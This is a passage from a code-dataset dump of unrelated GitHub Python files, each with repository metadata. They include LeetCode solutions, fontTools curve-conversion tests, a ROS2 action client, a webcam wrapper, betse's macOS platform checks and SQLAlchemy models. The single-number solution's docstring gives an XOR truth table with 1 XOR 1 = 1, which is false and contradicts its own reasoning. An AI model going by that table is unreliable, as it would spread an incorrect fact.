exit(1)","repo_name":"vsevolodnedora/bns_ppr_scripts","sub_path":"nucleo.py","file_name":"nucleo.py","file_ext":"py","file_size_in_byte":8548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"19104507426","text":"######################################################\n\n# Solved on Tuesday, 15 - 02 - 2022.\n\n######################################################\n\n\n######################################################\n\n# Runtime: 124ms - 97.37%\n# Memory: 16.3MB - 98.38%\n\n######################################################\n\nclass Solution:\n def singleNumber(self, nums: List[int]) -> int:\n \"\"\"\n We use XOR operation to do this problem using O(1) space and O(n)\n time complexity.\n Truth Table of XOR is\n A B A^B\n 0 0 0\n 0 1 1\n 1 0 1\n 1 1 1\n We can see that if A and B have same bit we will get 0 as answer\n So, lets consider example [4, 1, 2, 1, 2]\n In binary they are [100, 001, 010, 001, 010]\n\n What we do is find XOR of all number in array and store it in number\n So,\n number = 100 ^ 001 ^ 010 ^ 001 ^ 010\n XOR is commutative. So A ^ B = B ^ A\n So, we consider above number operation in different order so that we\n can understand the logic\n number = 001 ^ 001 ^ 010 ^ 010 ^ 100\n XOR is associative. So A ^ (B ^ C) = (A ^ B) ^ C\n number = (001 ^ 001) ^ (010 ^ 010) ^ 100\n According to truth table above, if both A and B are same, we get 0. \n So, if a numA = numB, we will get 0 as XOR.\n number = 000 ^ 000 ^ 100\n 000 ^ 000 = 000\n number = 000 ^ 100\n From truth table of XOR, number = 100 ==> 4\n\n Therefore logic is to perfom XOR of all numbers and returning it\n \"\"\"\n number = 0\n \n for num in nums:\n number = number ^ num\n \n return number","repo_name":"Shannu26/leetcode-solutions","sub_path":"131 - 140/P136_SingleNumber.py","file_name":"P136_SingleNumber.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"12752586211","text":"import sys\r\ninput = sys.stdin.readline\r\nn = int(input())\r\na = []\r\nfor _ in range(n):\r\n a.append(list(map(int, input().split())))\r\na.sort(key=lambda x: (x[1], x[0]))\r\ncur = 0\r\nj = 1\r\ncnt = 1\r\nwhile cur < n and j < n:\r\n sc,ec = a[cur]\r\n sj,ej = a[j]\r\n if ec <= sj:\r\n cur = j\r\n cnt += 1\r\n j+= 1\r\nprint(cnt)","repo_name":"jfmam/coding-test","sub_path":"백준/Silver/1931. 회의실 배정/회의실 배정.py","file_name":"회의실 배정.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"36359192313","text":"\"\"\"\nModule containing utility functions\n\nmanage_time - HH:MM:SS formatted string from\n\t\t\t given seconds int\nsave_to_csv - saves given data in a csv file\n\n\"\"\"\ndef manage_time(time):\n\t\"\"\" Shorten time frame to minutes or hours\n\n\t\tParameters\n\t\t----------\n\t\t\ttime : int\n\t\t\t\ttime in seconds\n\n\t\tReturns\n\t\t-------\n\t\t\tstring\n\t\t\t\ttime in HH:MM:SS format\n\t\"\"\"\n\n\tif time < 60:\n\t\treturn(\"{:02}:{:02}:{:02}\".format(0, 0, time))\n\n\telif time >= 60 and time < 3600:\n\t\tminutes = int(time/60)\n\t\tseconds = time - 60*minutes\n\t\treturn(\"{:02}:{:02}:{:02}\".format(0, minutes, seconds))\n\n\telif time >= 3600:\n\t\thours = int(time/3600)\n\t\tminutes = int( (time - hours*3600) / 60)\n\t\tseconds = int (time - hours*3600 - minutes*60)\n\t\treturn(\"{:02}:{:02}:{:02}\".format(hours, minutes, seconds))\n\t\t\t\n\ndef save_to_csv(data, filename):\n\t\"\"\" Save given data to a csv file\n\n\t\tParameters\n\t\t----------\n\t\t\tdata : list\n\t\t\t\tdata to be saved and splitted by commas\n\t\t\tfilename : str\n\t\t\t\tfilename of the file to save the data to\n\n\t\tReturns\n\t\t-------\n\t\t\tfile : file\n\t\t\t\tsaves data to the output csv file\n\t\t\"\"\"\n\t# if given filename doesn't end with .csv:\n\tif filename[-4:] is not '.csv':\n\t\tfilename = \"%s.csv\" % (filename)\n\n\twith open(filename, 'w') as file:\n\t\tfor line in data:\n\t\t\tfile.write(\"%d,%d,%s\\n\" % (line[0], line[1], line[2]))","repo_name":"ashanowski/symulacja_komputerowa","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16480267167","text":"#Task2\ndef rotateLeft(lst,k):\n \n for k in range(k):\n temp = lst[0]\n for elm in range(len(lst)-1):\n lst[elm] = lst[elm+1]\n lst[elm+1] = temp\n return lst\n\nprint(rotateLeft([10,20,30,40,50,60],11))","repo_name":"ikramulkayes/Python_Season_4","sub_path":"21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"74600806513","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def deleteDuplicates(self, head: Optional[ListNode]) -> Optional[ListNode]:\n cur = head\n while cur: # while cur is not null (after end of list)\n while cur.next and cur.next.val == cur.val: # while cur.next is not null and the next value is the same\n cur.next = cur.next.next # skip the next value (deletes node)\n cur = cur.next # move to next node\n return head\n\n","repo_name":"ericajstevenson/leetcode","sub_path":"86.py","file_name":"86.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"35868520013","text":"import sys\n\nsys.path[0] = '../..'\nimport config\nfrom QuantumCapital import constants\nfrom QuantumCapital.DBManager import DBManager\n\n\nclass LastBarRemover:\n def __init__(self):\n self.dbm = DBManager(config.DB_USERNAME, config.DB_PASS, 'BARS_DAY')\n self.dict_tbl = constants.DAY_BAR_DICTIONARY_TABLE\n self.presence_tbl = constants.DAY_BAR_RUSSEL_PRESENCE_TABLE\n\n def remove_last_bars(self, year):\n tickers = self.get_year_tickers(year)\n for ticker in tickers:\n ticker_info = self.dbm.select_df(f'select table_name, last_date, bars_count \\\n from {self.dict_tbl} where ticker=\\'{ticker}\\'')\n table_name = ticker_info.iloc[0].table_name\n last_date = ticker_info.iloc[0].last_date\n bars_count = ticker_info.iloc[0].bars_count\n\n self.dbm.delete_table_row(table_name, {'dt': \"\\'\" + str(last_date) + \"\\'\"})\n\n last_date_new = self.dbm.select_df(f'select dt from {table_name} order by dt desc')\n last_date_new = last_date_new.iloc[0]['dt']\n print(last_date, last_date_new)\n\n # (constants.DAY_BAR_DICTIONARY_TABLE,\n # {'last_date': f\"\\'{last_date}\\'\",\n # 'bars_count': f'bars_count + {new_bars_count}',\n # 'years': \"\\'{\" + ', '.join([str(y) for y in years]) + \"}\\'\",\n # 'memory': size},\n # {'ticker': f\"\\'{ticker.upper()}\\'\"})\n self.dbm.update_table_row(self.dict_tbl, {'last_date': f\"\\'{last_date_new}\\'\", 'bars_count': f'bars_count - 1'},\n {'ticker': f\"\\'{ticker.upper()}\\'\"})\n\n print('----------------------')\n self.dbm.commit()\n\n def get_year_tickers(self, year):\n df = self.dbm.select_df(f'select * from {self.presence_tbl} where yr={year}')\n assert df.shape[0] == 1\n return df.iloc[0].present\n\n\nif __name__ == '__main__':\n remover = LastBarRemover()\n remover.remove_last_bars(2020)\n","repo_name":"BatyaGG/QCapital","sub_path":"DataParsers/IB/OneDay/LastBarRemover.py","file_name":"LastBarRemover.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27263185876","text":"import collections\nimport math\nimport unittest\nimport os\nimport json\n\nfrom fontTools.cu2qu import curve_to_quadratic, curves_to_quadratic\n\n\nDATADIR = os.path.join(os.path.dirname(__file__), \"data\")\n\nMAX_ERR = 5\n\n\nclass CurveToQuadraticTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n \"\"\"Do the curve conversion ahead of time, and run tests on results.\"\"\"\n with open(os.path.join(DATADIR, \"curves.json\"), \"r\") as fp:\n curves = json.load(fp)\n\n cls.single_splines = [curve_to_quadratic(c, MAX_ERR) for c in curves]\n cls.single_errors = [\n cls.curve_spline_dist(c, s) for c, s in zip(curves, cls.single_splines)\n ]\n\n curve_groups = [curves[i : i + 3] for i in range(0, 300, 3)]\n cls.compat_splines = [\n curves_to_quadratic(c, [MAX_ERR] * 3) for c in curve_groups\n ]\n cls.compat_errors = [\n [cls.curve_spline_dist(c, s) for c, s in zip(curve_group, splines)]\n for curve_group, splines in zip(curve_groups, cls.compat_splines)\n ]\n\n cls.results = []\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"Print stats from conversion, as determined during tests.\"\"\"\n\n for tag, results in cls.results:\n print(\n \"\\n%s\\n%s\"\n % (\n tag,\n \"\\n\".join(\n \"%s: %s (%d)\" % (k, \"#\" * (v // 10 + 1), v)\n for k, v in sorted(results.items())\n ),\n )\n )\n\n def test_results_unchanged(self):\n \"\"\"Tests that the results of conversion haven't changed since the time\n of this test's writing. Useful as a quick check whenever one modifies\n the conversion algorithm.\n \"\"\"\n\n expected = {2: 6, 3: 26, 4: 82, 5: 232, 6: 360, 7: 266, 8: 28}\n\n results = collections.defaultdict(int)\n for spline in self.single_splines:\n n = len(spline) - 2\n results[n] += 1\n self.assertEqual(results, expected)\n self.results.append((\"single spline lengths\", results))\n\n def test_results_unchanged_multiple(self):\n \"\"\"Test that conversion results are unchanged for multiple curves.\"\"\"\n\n expected = {5: 11, 6: 35, 7: 49, 8: 5}\n\n results = collections.defaultdict(int)\n for splines in self.compat_splines:\n n = len(splines[0]) - 2\n for spline in splines[1:]:\n self.assertEqual(\n len(spline) - 2, n, \"Got incompatible conversion results\"\n )\n results[n] += 1\n self.assertEqual(results, expected)\n self.results.append((\"compatible spline lengths\", results))\n\n def test_does_not_exceed_tolerance(self):\n \"\"\"Test that conversion results do not exceed given error tolerance.\"\"\"\n\n results = collections.defaultdict(int)\n for error in self.single_errors:\n results[round(error, 1)] += 1\n self.assertLessEqual(error, MAX_ERR)\n self.results.append((\"single errors\", results))\n\n def test_does_not_exceed_tolerance_multiple(self):\n \"\"\"Test that error tolerance isn't exceeded for multiple curves.\"\"\"\n\n results = collections.defaultdict(int)\n for errors in self.compat_errors:\n for error in errors:\n results[round(error, 1)] += 1\n self.assertLessEqual(error, MAX_ERR)\n self.results.append((\"compatible errors\", results))\n\n @classmethod\n def curve_spline_dist(cls, bezier, spline, total_steps=20):\n \"\"\"Max distance between a bezier and quadratic spline at sampled points.\"\"\"\n\n error = 0\n n = len(spline) - 2\n steps = total_steps // n\n for i in range(0, n - 1):\n p1 = spline[0] if i == 0 else p3\n p2 = spline[i + 1]\n if i < n - 1:\n p3 = cls.lerp(spline[i + 1], spline[i + 2], 0.5)\n else:\n p3 = spline[n + 2]\n segment = p1, p2, p3\n for j in range(steps):\n error = max(\n error,\n cls.dist(\n cls.cubic_bezier_at(bezier, (j / steps + i) / n),\n cls.quadratic_bezier_at(segment, j / steps),\n ),\n )\n return error\n\n @classmethod\n def lerp(cls, p1, p2, t):\n (x1, y1), (x2, y2) = p1, p2\n return x1 + (x2 - x1) * t, y1 + (y2 - y1) * t\n\n @classmethod\n def dist(cls, p1, p2):\n (x1, y1), (x2, y2) = p1, p2\n return math.hypot(x1 - x2, y1 - y2)\n\n @classmethod\n def quadratic_bezier_at(cls, b, t):\n (x1, y1), (x2, y2), (x3, y3) = b\n _t = 1 - t\n t2 = t * t\n _t2 = _t * _t\n _2_t_t = 2 * t * _t\n return (_t2 * x1 + _2_t_t * x2 + t2 * x3, _t2 * y1 + _2_t_t * y2 + t2 * y3)\n\n @classmethod\n def cubic_bezier_at(cls, b, t):\n (x1, y1), (x2, y2), (x3, y3), (x4, y4) = b\n _t = 1 - t\n t2 = t * t\n _t2 = _t * _t\n t3 = t * t2\n _t3 = _t * _t2\n _3_t2_t = 3 * t2 * _t\n _3_t_t2 = 3 * t * _t2\n return (\n _t3 * x1 + _3_t_t2 * x2 + _3_t2_t * x3 + t3 * x4,\n _t3 * y1 + _3_t_t2 * y2 + _3_t2_t * y3 + t3 * y4,\n )\n\n\nclass AllQuadraticFalseTest(unittest.TestCase):\n def test_cubic(self):\n cubic = [(0, 0), (0, 1), (2, 1), (2, 0)]\n result = curve_to_quadratic(cubic, 0.1, all_quadratic=False)\n assert result == cubic\n\n def test_quadratic(self):\n cubic = [(0, 0), (2, 2), (4, 2), (6, 0)]\n result = curve_to_quadratic(cubic, 0.1, all_quadratic=False)\n quadratic = [(0, 0), (3, 3), (6, 0)]\n assert result == quadratic\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"fonttools/fonttools","sub_path":"Tests/cu2qu/cu2qu_test.py","file_name":"cu2qu_test.py","file_ext":"py","file_size_in_byte":5834,"program_lang":"python","lang":"en","doc_type":"code","stars":3868,"dataset":"github-code","pt":"39"} +{"seq_id":"5882643476","text":"\"\"\"Webcam camera.\"\"\"\nimport logging\n\nimport cv2\n\nfrom ..utils import memory, settings\n\n\nclass Webcam:\n \"\"\"Webcam class.\"\"\"\n\n def __init__(\n self,\n memory=memory.mem,\n index=0,\n shape=tuple(settings.settings.IMAGE_SHAPE),\n ):\n \"\"\"Camera init.\n\n Args:\n index (int, optional): index of the camera. Defaults to 0.\n shape (tuple, optional): shape of the output image. Defaults to (160, 120, 3).\n \"\"\"\n self.memory = memory\n\n self.cap = cv2.VideoCapture(index)\n ret, img = self.cap.read()\n assert ret, \"Couldn't read from camera\"\n\n self.shape = shape\n assert len(self.shape) == 3, \"Shape should have 3 dimensions\"\n\n self.h, self.w, self.c = self.shape\n assert self.c in [\n 1,\n 3,\n ], \"Image last dimension should be either 3 (RGB) or 1 (GREY)\"\n logging.info(\"Instantiated Webcam camera.\")\n\n def update(self):\n \"\"\"Read image from the camera.\n\n Raises:\n ValueError: if couldn't grab the image, raise a valueError.\n \"\"\"\n ret, img = self.cap.read()\n if ret:\n img = cv2.resize(img, (self.w, self.h))\n if self.c == 3:\n self.memory[\"image\"] = img\n else:\n self.memory[\"image\"] = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n else:\n raise ValueError(\"Image read failed\")\n","repo_name":"Autonomobile/AutoPylot","sub_path":"autopylot/cameras/webcam.py","file_name":"webcam.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"39"} +{"seq_id":"3142243795","text":"#!/usr/bin/env python\n\n#======================================================================\n# Set-up \n\n# config.py holds credentials that should not be shared and other setup values\nimport config\nfrom datetime import datetime\nimport logging\n\n\n###################### Set up Logging\nlogfile = config.LOGFILE\n\n# get Date and time\ndt_object = datetime.now()\n# Create time format for Logging\nmodified = dt_object.strftime('_%Y-%m-%d_%H_%M')\nlogfile = logfile + modified + \".txt\"\n\n# configure logging\nFORMAT = '%(asctime)-20s %(levelname)-8s %(message)s'\nlogging.basicConfig(filename=logfile, level=logging.INFO, format=FORMAT, datefmt='%Y-%m-%d %H:%M:%S')\n\n###################### End of Logging Setup\n\n\ndef setup(): # Shutdown GPIO and Cleanup modules\n\n print ('\\n\\nSetting Up ...\\n')\n\n \n \n# End of set-up Procedures \n#======================================================================\n\n#======================================================================\n# Clean-up \n \ndef destroy(): # Shutdown GPIO and Cleanup modules\n\n print ('\\n\\nCleaning Up ...\\n')\n\n #GPIO.cleanup() # Release GPIO resource\n \n# End of Clean-up Procedures \n#======================================================================\n\n#====================================================================== \n# Main Control Procedure\n \ndef maincontrol(): # Main Control Loop\n\n print ('\\n\\nMain Loop ...\\n')\n\n# Main functionality goes here\n\n# End of Main Control Procedure \n#====================================================================== \n\n#====================================================================== \n# __Main__ Startup Loop \n \nif __name__ == '__main__': # If this is loaded as he main Program will start from here\n \n # Get and parse Arguments\n \n setup() # Setup\n\n print ('\\nGo ...\\n\\n')\n\t\n try:\n maincontrol() # Call main loop\n destroy() # Shutdown\n print ('\\n\\n................... Exit .......................\\n\\n')\n exit(0) # Exit Cleanly\n except KeyboardInterrupt:\n destroy()\n print ('\\n\\n................... Exit .......................\\n\\n')\n exit(0) # Exit Cleanly\n \n# End of __Main__ Startup Loop \n#======================================================================\n\n\n\n","repo_name":"CosmaP/Misc-Junk","sub_path":"Python_Template.py","file_name":"Python_Template.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31695749042","text":"import os\nimport time\n\nfrom shr_msgs.action import FindPersonRequest, GatherInformationRequest\nfrom rclpy.action import ActionServer, ActionClient\nfrom rclpy.action import CancelResponse\nfrom rclpy.node import Node\nimport rclpy\n\nfrom std_msgs.msg import Bool\nfrom shr_msgs.msg import WorldState\n\nimport datetime\nimport time\nclass MyActionClient(Node):\n def __init__(self):\n super().__init__(\"my_action_client\")\n self.goal_handle = None\n self._action_client = ActionClient(self, GatherInformationRequest, 'gather_information')\n\n def send_goal(self):\n #Send an action goal\n goal_msg = GatherInformationRequest.Goal()\n goal_msg.states = ['patient_location']\n self._action_client.wait_for_server()\n future = self._action_client.send_goal_async(goal_msg)\n future.add_done_callback(self.goal_response_callback)\n\n def goal_response_callback(self, future):\n self.goal_handle = future.result()\n if not self.goal_handle.accepted:\n self.get_logger().info('Goal rejected :(')\n return\n\n self.get_logger().info('Goal accepted :)')\n\n # self._get_result_future = self.goal_handle.get_result_async()\n\n def cancel_goal(self):\n self.get_logger().info('Canceling goal')\n future = self.goal_handle.cancel_goal_async()\n future.add_done_callback(self.goal_canceled_callback)\n\n def goal_canceled_callback(self, future):\n cancel_response = future.result()\n if len(cancel_response.goals_canceling) > 0:\n self.get_logger().info('Cancelling of goal complete')\n else:\n self.get_logger().warning('Goal failed to cancel')\n\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n world_state_node = MyActionClient()\n world_state_node.send_goal()\n start = time.time()\n while world_state_node.goal_handle is None:\n rclpy.spin_once(world_state_node)\n\n world_state_node.cancel_goal()\n\n rclpy.spin(world_state_node)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AssistiveRoboticsUNH/smart-home","sub_path":"shr_world_state/shr_world_state/client_node_test.py","file_name":"client_node_test.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"} +{"seq_id":"5014217328","text":"\"\"\"\nGiven an image of size n*m, location of a pixel in the screen i,e(sr, cc) and color newColor, \nyour task is to replace color of the given pixel and all adjacent(excluding diagonally adjacent) same colored pixels with the given color newColor.\n \n\nExample 1:\n\nInput: image = {{1,1,1},{1,1,0},{1,0,1}},\nsr = 1, sc = 1, newColor = 2.\nOutput: {{2,2,2},{2,2,0},{2,0,1}}\nExplanation: From the center of the image \n(with position (sr, sc) = (1, 1)), all \npixels connected by a path of the same color\nas the starting pixel are colored with the new \ncolor.Note the bottom corner is not colored 2, \nbecause it is not 4-directionally connected to \nthe starting pixel.\n\nIt is an extension to rotting oranges problem which we did in bfs and we have did this in dfs to increase our knowledge\n\"\"\"\ndef floodFill(self, image, sr, sc, new):\n #Code here\n prev = image[sr][sc]\n def solve(image,sr,sc,new,prev):\n if sr < 0 or sc < 0 or sr >= n or sc >= m or image[sr][sc] != prev or image[sr][sc] == new:\n return\n image[sr][sc] = new\n \n solve(image,sr+1,sc,new,prev)\n solve(image,sr-1,sc,new,prev)\n solve(image,sr,sc+1,new,prev)\n solve(image,sr,sc-1,new,prev)\n solve(image,sr,sc,new,prev)\n return image\n\"\"\"\nTC = o(n*m)\nSC = o(n*m)\n\"\"\"","repo_name":"Yug-gurnani/DSA-Questions","sub_path":"SDE sheet/22. Mixed Questions/6. Flood fill algorithm.py","file_name":"6. Flood fill algorithm.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"39"} +{"seq_id":"75018451634","text":"import os\nimport shutil\nimport sys\nfrom datetime import datetime\nfrom importlib import import_module\nfrom pathlib import Path\n\nfrom .exceptions import ExistingExperimentFound\n\n\ndef get_save_dir(config_path):\n \"\"\"Determine the path where the experimental results will be saved.\"\"\"\n parts = str(config_path).split('/')\n i = parts.index('experiments')\n root_dir = os.path.expandvars('$SM_MODEL_DIR')\n save_dir = os.path.join(root_dir, *parts[i+1:-1])\n if not os.path.exists(save_dir):\n os.makedirs(save_dir, exist_ok=True)\n return save_dir\n\n\ndef get_experiment_id(checkpoint_id, trial, save_dir, resume):\n chkpt_dir = Path(save_dir) / 'checkpoints'\n if resume and not checkpoint_id and chkpt_dir.exists:\n paths = chkpt_dir.glob('*/last.ckpt')\n checkpoint_id = next(paths).parent.name\n now = datetime.now().strftime('%Y%m%d-%H%M%S-%f')\n return checkpoint_id or f'trial-{trial}-{now}'\n\n\ndef import_string(dotted_path):\n \"\"\"Import a dotted module path.\n\n And return the attribute/class designated by the\n last name in the path. Raise ImportError if the import failed.\n\n Adatped from https://stackoverflow.com/a/34963527/3790116.\n \"\"\"\n try:\n module_path, class_name = dotted_path.rsplit('.', 1)\n except ValueError as e:\n msg = \"%s doesn't look like a module path\" % dotted_path\n raise ImportError.with_traceback(ImportError(msg), sys.exc_info()[2])\n\n module = import_module(module_path)\n\n try:\n return getattr(module, class_name)\n except AttributeError:\n msg = 'Module \"%s\" does not define a \"%s\" attribute/class' % (\n module_path, class_name)\n raise ImportError.with_traceback(ImportError(msg), sys.exc_info()[2])\n\n\ndef delete_old_results(results_dir, force, trial, resume):\n \"\"\"Delete existing checkpoints and wandb logs if --force is enabled.\"\"\"\n wandb_dir = Path(results_dir) / 'wandb'\n wandb_matches = list(wandb_dir.glob(f'*-trial-{trial}-*'))\n\n chkpt_dir = Path(results_dir) / 'checkpoints'\n chkpt_matches = list(chkpt_dir.glob(f'trial-{trial}-*'))\n\n if force and wandb_matches:\n [shutil.rmtree(p) for p in wandb_matches]\n\n if force and chkpt_matches:\n [shutil.rmtree(p) for p in chkpt_matches]\n\n if not force and not resume and wandb_matches:\n raise ExistingExperimentFound(f'Directory already exists: {wandb_dir}')\n\n if not force and not resume and chkpt_matches:\n raise ExistingExperimentFound(f'Directory already exists: {chkpt_dir}')\n","repo_name":"alasdairtran/fourierflow","sub_path":"fourierflow/utils/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"39"} +{"seq_id":"18469043344","text":"import platform\nfrom betse.exceptions import BetseOSException\nfrom betse.util.io.log.logs import log_warning\nfrom betse.util.type.decorator.decmemo import func_cached\nfrom ctypes import CDLL, byref, c_int\n\n# ....................{ CONSTANTS }....................\n_SECURITY_FRAMEWORK_DYLIB_FILENAME = (\n '/System/Library/Frameworks/Security.framework/Security')\n'''\nAbsolute path of the system-wide ``\"Security.framework\"`` Macho-O shared library\nproviding the macOS-specific security context for the current process.\n\nThis library is dynamically loadable into the address space of the current\nprocess with the :class:`ctypes.CDLL` class. Since all Macho-O shared libraries\nnecessarily have the filetype ``\".dylib\"``, this filetype can be safely omitted.\n'''\n\n\n_SECURITY_SESSION_ID_CURRENT = -1\n'''\nMagic integer defined as `callerSecuritySession` by the macOS-specific\n`/System/Library/Frameworks/Security.Framework/Headers/AuthSession.h` C header\nsuitable for passing to C functions accepting parameters of C type\n`SecuritySessionId` (e.g., `SessionGetInfo()`).\n\nWhen passed, this integer signifies the **current security session** (i.e., the\nthe security session to which the current process belongs).\n\nSee Also\n----------\nhttps://opensource.apple.com/source/libsecurity_authorization/libsecurity_authorization-32564/lib/AuthSession.h\n C header defining this magic integer.\n'''\n\n\n_SECURITY_SESSION_HAS_GRAPHIC_ACCESS = 0x0010\n'''\nBit flag defined as `sessionHasGraphicAccess` by the macOS-specific\n`/System/Library/Frameworks/Security.Framework/Headers/AuthSession.h` C header\nmasking the attributes bit field returned by the `SessionGetInfo()` C function\nalso declared by that header.\n\nWhen enabled, this bit signifies the current process to have access to the Aqua\ndisplay server and hence be headfull (rather than headless).\n\nSee Also\n----------\nhttps://opensource.apple.com/source/libsecurity_authorization/libsecurity_authorization-32564/lib/AuthSession.h\n C header defining this bit flag.\n'''\n\n# ....................{ EXCEPTIONS }....................\ndef die_unless_macos() -> None:\n '''\n Raise an exception unless the current platform is Apple macOS.\n\n See Also\n ----------\n :func:`is_macos`\n Further details.\n '''\n\n # Avoid circular import dependencies.\n from betse.util.os import oses\n\n # If the current platform is *NOT* macOS, raise an exception.\n if not is_macos():\n raise BetseOSException(f'{oses.get_name()} not macOS.')\n\n# ....................{ TESTERS }....................\n@func_cached\ndef is_macos() -> bool:\n '''\n ``True`` only if the current platform is Apple macOS, the operating\n system previously known as \"OS X.\"\n '''\n\n return platform.system() == 'Darwin'\n\n\n@func_cached\ndef is_aqua() -> bool:\n '''\n ``True`` only if the current process has access to the Aqua display server\n specific to macOS, implying this process to be headfull and hence support\n both CLIs and GUIs.\n\n See Also\n ----------\n https://developer.apple.com/library/content/technotes/tn2083/_index.html#//apple_ref/doc/uid/DTS10003794-CH1-SUBSECTION19\n \"Security Context\" subsection of \"Technical Note TN2083: Daemons and\n Agents,\" a psuedo-human-readable discussion of the\n ``sessionHasGraphicAccess`` bit flag returned by the low-level\n ``SessionGetInfo()`` C function.\n '''\n\n # Avoid circular import dependencies.\n from betse.util.path.files import is_file\n from betse.util.os.command.cmdexit import SUCCESS\n\n # If the current platform is *NOT* macOS, return false.\n if not is_macos():\n return False\n # Else, the current platform is macOS.\n\n # If the system-wide Macho-O shared library providing the macOS\n # security context for the current process does *NOT* exist (after\n # following symbolic links)...\n if not is_file(_SECURITY_FRAMEWORK_DYLIB_FILENAME):\n # Emit a non-fatal warning. Theoretically, this shared library should\n # *ALWAYS* exist across all macOS versions (including those still\n # actively maintained as of 2023 Q2). Pragmatically, this shared library\n # appears to *NOT* exist (for unknown reasons) on GitHub Actions macOS\n # runners. He have no control over GitHub Actions. Let's complain! \\o/\n log_warning(\n 'macOS shared library \"%s\" not found.',\n _SECURITY_FRAMEWORK_DYLIB_FILENAME)\n\n # Return false.\n return False\n # Else, this shared library exists.\n\n # Attempt all of the following in a safe manner catching, logging, and\n # converting exceptions into a false return value. This tester is *NOT*\n # mission-critical and hence should *NOT* halt the application on\n # library-specific failures.\n try:\n # Dynamically load this library into the address space of this process.\n security_framework = CDLL(_SECURITY_FRAMEWORK_DYLIB_FILENAME)\n\n # Possibly non-unique identifier of the security session to request the\n # attributes of, signifying that of the current process.\n session_id = _SECURITY_SESSION_ID_CURRENT\n\n # Unique identifier of the requested security session, returned\n # by reference from the SessionGetInfo() C function called below. This\n # identifier is useless for our purposes and hence ignored below.\n session_id_real = c_int(0)\n\n # Attributes bit field of the requested security session, returned by\n # reference from the SessionGetInfo() C function called below.\n session_attributes = c_int(0)\n\n # C-style error integer returned by calling the SessionGetInfo() C\n # function exported by this Macho-O shared library, passing:\n #\n # * The input non-unique session identifier by value.\n # * The output unique session identifier by reference.\n # * The output session attributes integer by reference.\n session_errno = security_framework.SessionGetInfo(\n session_id, byref(session_id_real), byref(session_attributes))\n\n # This process has access to the Aqua display server if and only if...\n return (\n # The above function call succeeded *AND*...\n session_errno == SUCCESS and\n # The session attributes bit field returned by this call has the\n # corresponding bit flag enabled.\n session_attributes.value & _SECURITY_SESSION_HAS_GRAPHIC_ACCESS\n )\n # If the above logic failed with any exception...\n except Exception as exception:\n # Human-readable exception message harvested from this exception,\n # defined as either:\n # * If this exception is a platform-specific \"OSError\" (as is likely due\n # to calling low-level platform-specific macOS kernel functions\n # above), the \"OSError.strerror\" instance variable of this exception.\n # * Else, the standard string representation of this exception.\n exception_message = getattr(exception, 'strerror', str(exception))\n\n # Log a non-fatal warning informing users of this failure.\n log_warning(\n 'macOS SessionGetInfo() function failed, as %s.', exception_message)\n\n # Assume this process to *NOT* have access to the Aqua display server.\n return False\n","repo_name":"betsee/betse","sub_path":"betse/util/os/brand/macos.py","file_name":"macos.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"39"} +{"seq_id":"23723038205","text":"from sqlalchemy import (Column, Integer)\nfrom sqlalchemy.orm import relationship\n\nfrom typing import List\nfrom .base import Base\nfrom .mixins import DateTimeMixin, UUIDidMixin\nfrom src.models.claim_line_item import ClaimLineItem\nfrom src.models.claim import Claim\n\n\nclass Plan(Base, DateTimeMixin, UUIDidMixin):\n __tablename__ = 'plans'\n\n vaccines = Column(Integer, nullable=False)\n wellness_exam = Column(Integer, nullable=False)\n blood_test = Column(Integer, nullable=False)\n\n # Return claims for a comparison of utilization\n claims: List[Claim] = relationship(\n \"Claim\",\n cascade=\"save-update, merge, delete\"\n )\n\n # Determine utilizations based on matching the ClaimLineItem \n # against the Line Item being \"approved\"\n @property\n def vaccine_utilization(self):\n line_items = self.claims[0].line_items\n\n for line_item in line_items:\n if line_item.claim_line_item_type == ClaimLineItem.ClaimLineItemTypeEnum.vaccine and line_item.decision == \"approved\":\n return line_item.quantity\n \n @property\n def blood_test_utilization(self):\n line_items = self.claims[0].line_items\n\n for line_item in line_items:\n if line_item.claim_line_item_type == ClaimLineItem.ClaimLineItemTypeEnum.blood_test and line_item.decision == \"approved\":\n return line_item.quantity\n \n @property\n def wellness_exam_utilization(self):\n line_items = self.claims[0].line_items\n\n for line_item in line_items:\n if line_item.claim_line_item_type == ClaimLineItem.ClaimLineItemTypeEnum.wellness_exam and line_item.decision == \"approved\":\n return 